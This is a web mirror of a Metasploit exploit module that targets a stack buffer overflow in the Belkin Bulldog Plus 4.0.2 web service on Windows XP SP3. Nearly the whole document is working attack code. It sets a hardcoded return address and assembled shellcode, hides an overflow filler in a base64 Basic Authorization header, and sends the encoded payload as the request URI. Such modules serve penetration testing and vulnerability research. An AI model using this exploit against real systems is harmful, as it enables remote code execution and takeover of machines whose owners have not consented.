Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/belkin_bulldog.rb
19851 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Belkin Bulldog Plus Web Service Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in Belkin Bulldog Plus

18
          4.0.2 build 1219. When sending a specially crafted http request,

19
          an attacker may be able to execute arbitrary code.

20
        },

21
        'Author' => [ 'MC' ],

22
        'License' => MSF_LICENSE,

23
        'References' => [

24
          [ 'OSVDB', '54395' ],

25
          [ 'BID', '34033' ],

26
          [ 'EDB', '8173' ]

27
        ],

28
        'Privileged' => true,

29
        'DefaultOptions' => {

30
          'EXITFUNC' => 'process',

31
          'AllowWin32SEH' => true

32
        },

33
        'Payload' => {

34
          'Space' => 750,

35
          'BadChars' => "\x00",

36
          'StackAdjustment' => -3500,

37
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,

38
          'DisableNops' => true,

39
        },

40
        'Platform' => 'win',

41
        'Targets' => [

42
          [ 'Windows XP SP3 English', { 'Ret' => 0x7e4456f7 } ],

43
        ],

44
        'DefaultTarget' => 0,

45
        'DisclosureDate' => '2009-03-08',

46
        'Notes' => {

47
          'Reliability' => UNKNOWN_RELIABILITY,

48
          'Stability' => UNKNOWN_STABILITY,

49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

50
        }

51
      )

52
    )

53
  end

54


55
  def exploit

56
    c = connect

57


58
    dwerd = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call dword [esp+58h]").encode_string

59


60
    filler = [target.ret].pack('V') + dwerd + make_nops(28)

61


62
    print_status("Trying target #{target.name}...")

63


64
    send_request_raw({

65
      'uri' => payload.encoded,

66
      'version' => '1.1',

67
      'method' => 'GET',

68
      'headers' =>

69
      {

70
        'Authorization' => "Basic #{Rex::Text.encode_base64(filler)}"

71
      }

72
    }, 5)

73


74
    handler

75
  end

76
end

77


78